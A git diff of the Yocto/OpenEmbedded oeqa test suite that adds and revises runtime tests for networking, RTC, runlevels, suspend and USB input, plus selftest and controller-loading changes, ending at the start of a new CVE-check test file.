diff --git a/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
new file mode 100644
index 0000000000..e010612838
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
@@ -0,0 +1,36 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+
+class Ethernet_Test(OERuntimeTestCase):
+
+ def set_ip(self, x):
+ x = x.split(".")
+ sample_host_address = '150'
+ x[3] = sample_host_address
+ x = '.'.join(x)
+ return x
+
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_set_virtual_ip(self):
+ (status, output) = self.target.run("ifconfig eth0 | grep 'inet ' | awk '{print $2}'")
+ self.assertEqual(status, 0, msg='Failed to get ip address. Make sure you have an ethernet connection on your device, output: %s' % output)
+ original_ip = output
+ virtual_ip = self.set_ip(original_ip)
+
+ (status, output) = self.target.run("ifconfig eth0:1 %s netmask 255.255.255.0 && sleep 2 && ping -c 5 %s && ifconfig eth0:1 down" % (virtual_ip,virtual_ip))
+ self.assertEqual(status, 0, msg='Failed to create virtual ip address, output: %s' % output)
+
+ @OETestDepends(['ethernet_ip_connman.Ethernet_Test.test_set_virtual_ip'])
+ def test_get_ip_from_dhcp(self):
+ (status, output) = self.target.run("connmanctl services | grep -E '*AO Wired|*AR Wired' | awk '{print $3}'")
+ self.assertEqual(status, 0, msg='No wired interfaces are detected, output: %s' % output)
+ wired_interfaces = output
+
+ (status, output) = self.target.run("ip route | grep default | awk '{print $3}'")
+ self.assertEqual(status, 0, msg='Failed to retrieve the default gateway, output: %s' % output)
+ default_gateway = output
+
+ (status, output) = self.target.run("connmanctl config %s --ipv4 dhcp && sleep 2 && ping -c 5 %s" % (wired_interfaces,default_gateway))
+ self.assertEqual(status, 0, msg='Failed to get dynamic IP address via DHCP in connmand, output: %s' % output) \ No newline at end of file
diff --git a/meta/lib/oeqa/runtime/cases/ksample.py b/meta/lib/oeqa/runtime/cases/ksample.py
index a9a1620ebd..9883aa9aa8 100644
--- a/meta/lib/oeqa/runtime/cases/ksample.py
+++ b/meta/lib/oeqa/runtime/cases/ksample.py
@@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
# need some kernel fragments
-# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
+# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
class KSample(OERuntimeTestCase):
def cmd_and_check(self, cmd='', match_string=''):
status, output = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ltp.py b/meta/lib/oeqa/runtime/cases/ltp.py
index a66d5d13d7..879f2a673c 100644
--- a/meta/lib/oeqa/runtime/cases/ltp.py
+++ b/meta/lib/oeqa/runtime/cases/ltp.py
@@ -67,7 +67,7 @@ class LtpTest(LtpTestBase):
def runltp(self, ltp_group):
cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group)
starttime = time.time()
- (status, output) = self.target.run(cmd)
+ (status, output) = self.target.run(cmd, timeout=1200)
endtime = time.time()
with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f:
diff --git a/meta/lib/oeqa/runtime/cases/pam.py b/meta/lib/oeqa/runtime/cases/pam.py
index 271a1943e3..a482ded945 100644
--- a/meta/lib/oeqa/runtime/cases/pam.py
+++ b/meta/lib/oeqa/runtime/cases/pam.py
@@ -8,11 +8,14 @@
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
+from oeqa.runtime.decorator.package import OEHasPackage
class PamBasicTest(OERuntimeTestCase):
@skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES')
@OETestDepends(['ssh.SSHTest.test_ssh'])
+ @OEHasPackage(['shadow'])
+ @OEHasPackage(['shadow-base'])
def test_pam(self):
status, output = self.target.run('login --help')
msg = ('login command does not work as expected. '
diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index a1791b5cca..1cac59725d 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -32,7 +32,7 @@ common_errors = [
"Failed to load module \"fbdev\"",
"Failed to load module fbdev",
"Failed to load module glx",
- "[drm] Cannot find any crtc or sizes - going 1024x768",
+ "[drm] Cannot find any crtc or sizes",
"_OSC failed (AE_NOT_FOUND); disabling ASPM",
"Open ACPI failed (/var/run/acpid.socket) (No such file or directory)",
"NX (Execute Disable) protection cannot be enabled: non-PAE kernel!",
@@ -61,6 +61,8 @@ common_errors = [
"[rdrand]: Initialization Failed",
"[pulseaudio] authkey.c: Failed to open cookie file",
"[pulseaudio] authkey.c: Failed to load authentication key",
+ "was skipped because of a failed condition check",
+ "was skipped because all trigger condition checks failed",
]
video_related = [
@@ -88,6 +90,9 @@ qemux86_common = [
'tsc: HPET/PMTIMER calibration failed',
"modeset(0): Failed to initialize the DRI2 extension",
"glamor initialization failed",
+ "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
+ "floppy: error",
+ 'failed to IDENTIFY (I/O error, err_mask=0x4)',
] + common_errors
ignore_errors = {
@@ -293,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase):
grepcmd = 'grep '
grepcmd += '-Ei "'
for error in errors:
- grepcmd += '\<' + error + '\>' + '|'
+ grepcmd += r'\<' + error + r'\>' + '|'
grepcmd = grepcmd[:-1]
grepcmd += '" ' + str(log) + " | grep -Eiv \'"
@@ -304,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase):
errorlist = ignore_errors['default']
for ignore_error in errorlist:
- ignore_error = ignore_error.replace('(', '\(')
- ignore_error = ignore_error.replace(')', '\)')
+ ignore_error = ignore_error.replace('(', r'\(')
+ ignore_error = ignore_error.replace(')', r'\)')
ignore_error = ignore_error.replace("'", '.')
- ignore_error = ignore_error.replace('?', '\?')
- ignore_error = ignore_error.replace('[', '\[')
- ignore_error = ignore_error.replace(']', '\]')
- ignore_error = ignore_error.replace('*', '\*')
+ ignore_error = ignore_error.replace('?', r'\?')
+ ignore_error = ignore_error.replace('[', r'\[')
+ ignore_error = ignore_error.replace(']', r'\]')
+ ignore_error = ignore_error.replace('*', r'\*')
ignore_error = ignore_error.replace('0-9', '[0-9]')
grepcmd += ignore_error + '|'
grepcmd = grepcmd[:-1]
diff --git a/meta/lib/oeqa/runtime/cases/ping.py b/meta/lib/oeqa/runtime/cases/ping.py
index f6603f75ec..498f80d0a5 100644
--- a/meta/lib/oeqa/runtime/cases/ping.py
+++ b/meta/lib/oeqa/runtime/cases/ping.py
@@ -6,6 +6,7 @@ from subprocess import Popen, PIPE
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.exception import OEQATimeoutError
class PingTest(OERuntimeTestCase):
@@ -13,14 +14,17 @@ class PingTest(OERuntimeTestCase):
def test_ping(self):
output = ''
count = 0
- while count < 5:
- cmd = 'ping -c 1 %s' % self.target.ip
- proc = Popen(cmd, shell=True, stdout=PIPE)
- output += proc.communicate()[0].decode('utf-8')
- if proc.poll() == 0:
- count += 1
- else:
- count = 0
+ try:
+ while count < 5:
+ cmd = 'ping -c 1 %s' % self.target.ip
+ proc = Popen(cmd, shell=True, stdout=PIPE)
+ output += proc.communicate()[0].decode('utf-8')
+ if proc.poll() == 0:
+ count += 1
+ else:
+ count = 0
+ except OEQATimeoutError:
+ self.fail("Ping timeout error for address %s, count %s, output: %s" % (self.target.ip, count, output))
msg = ('Expected 5 consecutive, got %d.\n'
'ping output is:\n%s' % (count,output))
self.assertEqual(count, 5, msg = msg)
diff --git a/meta/lib/oeqa/runtime/cases/ptest.py b/meta/lib/oeqa/runtime/cases/ptest.py
index ef0470da7e..2066d009c3 100644
--- a/meta/lib/oeqa/runtime/cases/ptest.py
+++ b/meta/lib/oeqa/runtime/cases/ptest.py
@@ -104,4 +104,5 @@ class PtestRunnerTest(OERuntimeTestCase):
failmsg = failmsg + "Failed ptests:\n%s" % pprint.pformat(failed_tests)
if failmsg:
+ self.logger.warning("There were failing ptests.")
self.fail(failmsg)
diff --git a/meta/lib/oeqa/runtime/cases/rpm.py b/meta/lib/oeqa/runtime/cases/rpm.py
index 8e18b426f8..203fcc8505 100644
--- a/meta/lib/oeqa/runtime/cases/rpm.py
+++ b/meta/lib/oeqa/runtime/cases/rpm.py
@@ -49,21 +49,20 @@ class RpmBasicTest(OERuntimeTestCase):
msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output)
self.assertEqual(status, 0, msg=msg)
- def check_no_process_for_user(u):
- _, output = self.target.run(self.tc.target_cmds['ps'])
- if u + ' ' in output:
- return False
- else:
- return True
+ def wait_for_no_process_for_user(u, timeout = 120):
+ timeout_at = time.time() + timeout
+ while time.time() < timeout_at:
+ _, output = self.target.run(self.tc.target_cmds['ps'])
+ if u + ' ' not in output:
+ return
+ time.sleep(1)
+ user_pss = [ps for ps in output.split("\n") if u + ' ' in ps]
+ msg = "User %s has processes still running: %s" % (u, "\n".join(user_pss))
+ self.fail(msg=msg)
def unset_up_test_user(u):
# ensure no test1 process in running
- timeout = time.time() + 30
- while time.time() < timeout:
- if check_no_process_for_user(u):
- break
- else:
- time.sleep(1)
+ wait_for_no_process_for_user(u)
status, output = self.target.run('userdel -r %s' % u)
msg = 'Failed to erase user: %s' % output
self.assertTrue(status == 0, msg=msg)
@@ -141,13 +140,4 @@ class RpmInstallRemoveTest(OERuntimeTestCase):
self.tc.target.run('rm -f %s' % self.dst)
- # if using systemd this should ensure all entries are flushed to /var
- status, output = self.target.run("journalctl --sync")
- # Get the amount of entries in the log file
- status, output = self.target.run(check_log_cmd)
- msg = 'Failed to get the final size of the log file.'
- self.assertEqual(0, status, msg=msg)
- # Check that there's enough of them
- self.assertGreaterEqual(int(output), 80,
- 'Cound not find sufficient amount of rpm entries in /var/log/messages, found {} entries'.format(output))
diff --git a/meta/lib/oeqa/runtime/cases/rtc.py b/meta/lib/oeqa/runtime/cases/rtc.py
new file mode 100644
index 0000000000..39f4d29f23
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/rtc.py
@@ -0,0 +1,40 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfFeature
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import re
+
+class RTCTest(OERuntimeTestCase):
+
+ def setUp(self):
+ if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+ self.logger.debug('Stopping systemd-timesyncd daemon')
+ self.target.run('systemctl disable --now --runtime systemd-timesyncd')
+
+ def tearDown(self):
+ if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+ self.logger.debug('Starting systemd-timesyncd daemon')
+ self.target.run('systemctl enable --now --runtime systemd-timesyncd')
+
+ @skipIfFeature('read-only-rootfs',
+ 'Test does not work with read-only-rootfs in IMAGE_FEATURES')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ @OEHasPackage(['coreutils', 'busybox'])
+ def test_rtc(self):
+ (status, output) = self.target.run('hwclock -r')
+ self.assertEqual(status, 0, msg='Failed to get RTC time, output: %s' % output)
+
+ (status, current_datetime) = self.target.run('date +"%m%d%H%M%Y"')
+ self.assertEqual(status, 0, msg='Failed to get system current date & time, output: %s' % current_datetime)
+
+ example_datetime = '062309452008'
+ (status, output) = self.target.run('date %s ; hwclock -w ; hwclock -r' % example_datetime)
+ check_hwclock = re.search('2008-06-23 09:45:..', output)
+ self.assertTrue(check_hwclock, msg='The RTC time was not set correctly, output: %s' % output)
+
+ (status, output) = self.target.run('date %s' % current_datetime)
+ self.assertEqual(status, 0, msg='Failed to reset system date & time, output: %s' % output)
+
+ (status, output) = self.target.run('hwclock -w')
+ self.assertEqual(status, 0, msg='Failed to reset RTC time, output: %s' % output)
diff --git a/meta/lib/oeqa/runtime/cases/runlevel.py b/meta/lib/oeqa/runtime/cases/runlevel.py
new file mode 100644
index 0000000000..3a4df8ace1
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/runlevel.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+
+import time
+
+class RunLevel_Test(OERuntimeTestCase):
+
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_runlevel_3(self):
+ (status, output) = self.target.run("init 3 && sleep 5 && runlevel")
+ runlevel= '5 3'
+ self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 3, current runlevel : %s' % output[-1])
+ (status, output) = self.target.run("uname -a")
+ self.assertEqual(status, 0, msg='Failed to run uname command, output: %s' % output)
+
+ @OETestDepends(['runlevel.RunLevel_Test.test_runlevel_3'])
+ def test_runlevel_5(self):
+ (status, output) = self.target.run("init 5 && sleep 5 && runlevel")
+ runlevel = '3 5'
+ self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 5, current runlevel : %s' % output[-1])
+ (status, output) = self.target.run('export DISPLAY=:0 && x11perf -aa10text')
+ self.assertEqual(status, 0, msg='Failed to run 2D graphic test, output: %s' % output)
diff --git a/meta/lib/oeqa/runtime/cases/scp.py b/meta/lib/oeqa/runtime/cases/scp.py
index 3a5f292152..f2bbc947d6 100644
--- a/meta/lib/oeqa/runtime/cases/scp.py
+++ b/meta/lib/oeqa/runtime/cases/scp.py
@@ -23,7 +23,7 @@ class ScpTest(OERuntimeTestCase):
os.remove(cls.tmp_path)
@OETestDepends(['ssh.SSHTest.test_ssh'])
- @OEHasPackage(['openssh-scp', 'dropbear'])
+ @OEHasPackage(['openssh-scp'])
def test_scp_file(self):
dst = '/tmp/test_scp_file'
diff --git a/meta/lib/oeqa/runtime/cases/suspend.py b/meta/lib/oeqa/runtime/cases/suspend.py
new file mode 100644
index 0000000000..67b6f7e56f
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/suspend.py
@@ -0,0 +1,33 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+import threading
+import time
+
+class Suspend_Test(OERuntimeTestCase):
+
+ def test_date(self):
+ (status, output) = self.target.run('date')
+ self.assertEqual(status, 0, msg = 'Failed to run date command, output : %s' % output)
+
+ def test_ping(self):
+ t_thread = threading.Thread(target=self.target.run, args=("ping 8.8.8.8",))
+ t_thread.start()
+ time.sleep(2)
+
+ status, output = self.target.run('pidof ping')
+ self.target.run('kill -9 %s' % output)
+ self.assertEqual(status, 0, msg = 'Not able to find process that runs ping, output : %s' % output)
+
+ def set_suspend(self):
+ (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+ self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
+
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_suspend(self):
+ self.test_date()
+ self.test_ping()
+ self.set_suspend()
+ self.test_date()
+ self.test_ping()
diff --git a/meta/lib/oeqa/runtime/cases/terminal.py b/meta/lib/oeqa/runtime/cases/terminal.py
new file mode 100644
index 0000000000..8fcca99f47
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/terminal.py
@@ -0,0 +1,21 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import threading
+import time
+
+class TerminalTest(OERuntimeTestCase):
+
+ @OEHasPackage(['matchbox-terminal'])
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_terminal_running(self):
+ t_thread = threading.Thread(target=self.target.run, args=("export DISPLAY=:0 && matchbox-terminal -e 'sh -c \"uname -a && exec sh\"'",))
+ t_thread.start()
+ time.sleep(2)
+
+ status, output = self.target.run('pidof matchbox-terminal')
+ number_of_terminal = len(output.split())
+ self.assertEqual(number_of_terminal, 1, msg='There should be only one terminal being launched. Number of terminal launched : %s' % number_of_terminal)
+ self.target.run('kill -9 %s' % output)
+ self.assertEqual(status, 0, msg='Not able to find process that runs terminal.')
diff --git a/meta/lib/oeqa/runtime/cases/usb_hid.py b/meta/lib/oeqa/runtime/cases/usb_hid.py
new file mode 100644
index 0000000000..3c292cf661
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/usb_hid.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+from oeqa.runtime.decorator.package import OEHasPackage
+
+class USB_HID_Test(OERuntimeTestCase):
+
+ def keyboard_mouse_simulation(self):
+ (status, output) = self.target.run('export DISPLAY=:0 && xdotool key F2 && xdotool mousemove 100 100')
+ return self.assertEqual(status, 0, msg = 'Failed to simulate keyboard/mouse input event, output : %s' % output)
+
+ def set_suspend(self):
+ (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+ return self.assertEqual(status, 0, msg = 'Failed to suspends your system to RAM, output : %s' % output)
+
+ @OEHasPackage(['xdotool'])
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_USB_Hid_input(self):
+ self.keyboard_mouse_simulation()
+ self.set_suspend()
+ self.keyboard_mouse_simulation()
diff --git a/meta/lib/oeqa/runtime/context.py b/meta/lib/oeqa/runtime/context.py
index 3826f27642..8a0dbd0736 100644
--- a/meta/lib/oeqa/runtime/context.py
+++ b/meta/lib/oeqa/runtime/context.py
@@ -5,6 +5,7 @@
#
import os
+import sys
from oeqa.core.context import OETestContext, OETestContextExecutor
from oeqa.core.target.ssh import OESSHTarget
@@ -66,11 +67,11 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
% self.default_target_type)
runtime_group.add_argument('--target-ip', action='store',
default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address and optionally ssh port (default 22) of device under test, for example '192.168.0.7:22'. Default: %s" \
% self.default_target_ip)
runtime_group.add_argument('--server-ip', action='store',
default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address of the test host from test target machine, default: %s" \
% self.default_server_ip)
runtime_group.add_argument('--host-dumper-dir', action='store',
@@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# XXX: Don't base your targets on this code it will be refactored
# in the near future.
# Custom target module loading
- target_modules_path = kwargs.get('target_modules_path', '')
- controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path)
+ controller = OERuntimeTestContextExecutor.getControllerModule(target_type)
target = controller(logger, target_ip, server_ip, **kwargs)
return target
@@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# AttributeError raised if not found.
# ImportError raised if a provided module can not be imported.
@staticmethod
- def getControllerModule(target, target_modules_path):
- controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path)
+ def getControllerModule(target):
+ controllerslist = OERuntimeTestContextExecutor._getControllerModulenames()
controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist)
return controller
# Return a list of all python modules in lib/oeqa/controllers for each
# layer in bbpath
@staticmethod
- def _getControllerModulenames(target_modules_path):
+ def _getControllerModulenames():
controllerslist = []
@@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
else:
raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module)
- extpath = target_modules_path.split(':')
- for p in extpath:
- controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers')
+ for p in sys.path:
+ controllerpath = os.path.join(p, 'oeqa', 'controllers')
if os.path.exists(controllerpath):
add_controller_list(controllerpath)
return controllerslist
@@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# Search for and return a controller or None from given module name
@staticmethod
def _loadControllerFromModule(target, modulename):
- obj = None
- # import module, allowing it to raise import exception
- module = __import__(modulename, globals(), locals(), [target])
- # look for target class in the module, catching any exceptions as it
- # is valid that a module may not have the target class.
try:
- obj = getattr(module, target)
- except:
- obj = None
- return obj
+ import importlib
+ module = importlib.import_module(modulename)
+ return getattr(module, target)
+ except AttributeError:
+ return None
@staticmethod
def readPackagesManifest(manifest):
diff --git a/meta/lib/oeqa/sdk/cases/buildepoxy.py b/meta/lib/oeqa/sdk/cases/buildepoxy.py
index 385f8ccca8..f69f720cd6 100644
--- a/meta/lib/oeqa/sdk/cases/buildepoxy.py
+++ b/meta/lib/oeqa/sdk/cases/buildepoxy.py
@@ -17,7 +17,7 @@ class EpoxyTest(OESDKTestCase):
"""
def setUp(self):
if not (self.tc.hasHostPackage("nativesdk-meson")):
- raise unittest.SkipTest("GalculatorTest class: SDK doesn't contain Meson")
+ raise unittest.SkipTest("EpoxyTest class: SDK doesn't contain Meson")
def test_epoxy(self):
with tempfile.TemporaryDirectory(prefix="epoxy", dir=self.tc.sdk_dir) as testdir:
diff --git a/meta/lib/oeqa/selftest/cases/archiver.py b/meta/lib/oeqa/selftest/cases/archiver.py
index bc5447d2a3..6a5c8ec71e 100644
--- a/meta/lib/oeqa/selftest/cases/archiver.py
+++ b/meta/lib/oeqa/selftest/cases/archiver.py
@@ -35,11 +35,11 @@ class Archiver(OESelftestTestCase):
src_path = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['TARGET_SYS'])
# Check that include_recipe was included
- included_present = len(glob.glob(src_path + '/%s-*' % include_recipe))
+ included_present = len(glob.glob(src_path + '/%s-*/*' % include_recipe))
self.assertTrue(included_present, 'Recipe %s was not included.' % include_recipe)
# Check that exclude_recipe was excluded
- excluded_present = len(glob.glob(src_path + '/%s-*' % exclude_recipe))
+ excluded_present = len(glob.glob(src_path + '/%s-*/*' % exclude_recipe))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % exclude_recipe)
def test_archiver_filters_by_type(self):
@@ -67,11 +67,11 @@ class Archiver(OESelftestTestCase):
src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
# Check that target_recipe was included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipe))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipe))
self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipe)
# Check that native_recipe was excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipe))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipe))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipe)
def test_archiver_filters_by_type_and_name(self):
@@ -104,17 +104,17 @@ class Archiver(OESelftestTestCase):
src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
# Check that target_recipe[0] and native_recipes[1] were included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[0]))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[0]))
self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipes[0])
- included_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[1]))
+ included_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[1]))
self.assertTrue(included_present, 'Recipe %s was not included.' % native_recipes[1])
# Check that native_recipes[0] and target_recipes[1] were excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[0]))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[0]))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipes[0])
- excluded_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[1]))
+ excluded_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[1]))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % target_recipes[1])
diff --git a/meta/lib/oeqa/selftest/cases/bblayers.py b/meta/lib/oeqa/selftest/cases/bblayers.py
index f131d9856c..7d74833f61 100644
--- a/meta/lib/oeqa/selftest/cases/bblayers.py
+++ b/meta/lib/oeqa/selftest/cases/bblayers.py
@@ -12,6 +12,11 @@ from oeqa.selftest.case import OESelftestTestCase
class BitbakeLayers(OESelftestTestCase):
+ def test_bitbakelayers_layerindexshowdepends(self):
+ result = runCmd('bitbake-layers layerindex-show-depends meta-poky')
+ find_in_contents = re.search("openembedded-core", result.output)
+ self.assertTrue(find_in_contents, msg = "openembedded-core should have been listed at this step. bitbake-layers layerindex-show-depends meta-poky output: %s" % result.output)
+
def test_bitbakelayers_showcrossdepends(self):
result = runCmd('bitbake-layers show-cross-depends')
self.assertIn('aspell', result.output)
diff --git a/meta/lib/oeqa/selftest/cases/bbtests.py b/meta/lib/oeqa/selftest/cases/bbtests.py
index dc423ec439..0b88316950 100644
--- a/meta/lib/oeqa/selftest/cases/bbtests.py
+++ b/meta/lib/oeqa/selftest/cases/bbtests.py
@@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\"
self.delete_recipeinc('man-db')
self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output)
self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output)
- line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.')
- self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \
-doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output)
def test_rename_downloaded_file(self):
# TODO unique dldir instead of using cleanall
@@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
""")
self.track_for_cleanup(os.path.join(self.builddir, "download-selftest"))
- data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
+ data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
self.write_recipeinc('aspell', data)
result = bitbake('-f -c fetch aspell', ignore_status=True)
self.delete_recipeinc('aspell')
@@ -188,6 +185,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
self.assertTrue(find, "No version returned for searched recipe. bitbake output: %s" % result.output)
def test_prefile(self):
+ # Test when the prefile does not exist
+ result = runCmd('bitbake -r conf/prefile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified prefile didn't exist: %s" % result.output)
+ # Test when the prefile exists
preconf = os.path.join(self.builddir, 'conf/prefile.conf')
self.track_for_cleanup(preconf)
ftools.write_file(preconf ,"TEST_PREFILE=\"prefile\"")
@@ -198,6 +199,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
self.assertIn('localconf', result.output)
def test_postfile(self):
+ # Test when the postfile does not exist
+ result = runCmd('bitbake -R conf/postfile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified postfile didn't exist: %s" % result.output)
+ # Test when the postfile exists
postconf = os.path.join(self.builddir, 'conf/postfile.conf')
self.track_for_cleanup(postconf)
ftools.write_file(postconf , "TEST_POSTFILE=\"postfile\"")
diff --git a/meta/lib/oeqa/selftest/cases/buildoptions.py b/meta/lib/oeqa/selftest/cases/buildoptions.py
index e91f0bd18f..b1b9ea7e55 100644
--- a/meta/lib/oeqa/selftest/cases/buildoptions.py
+++ b/meta/lib/oeqa/selftest/cases/buildoptions.py
@@ -57,15 +57,15 @@ class ImageOptionsTests(OESelftestTestCase):
class DiskMonTest(OESelftestTestCase):
def test_stoptask_behavior(self):
- self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay", ignore_status = True)
self.assertTrue('ERROR: No new tasks can be executed since the disk space monitor action is "STOPTASKS"!' in res.output, msg = "Tasks should have stopped. Disk monitor is set to STOPTASK: %s" % res.output)
self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay", ignore_status = True)
self.assertTrue('ERROR: Immediately abort since the disk space monitor action is "ABORT"!' in res.output, "Tasks should have been aborted immediatelly. Disk monitor is set to ABORT: %s" % res.output)
self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay")
self.assertTrue('WARNING: The free space' in res.output, msg = "A warning should have been displayed for disk monitor is set to WARN: %s" %res.output)
diff --git a/meta/lib/oeqa/selftest/cases/cve_check.py b/meta/lib/oeqa/selftest/cases/cve_check.py
new file mode 100644
index 0000000000..22ffeffd29
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/cve_check.py
@@ -0,0 +1,220 @@
+import json
+import os
+from oeqa.selftest.case import OESelftestTestCase
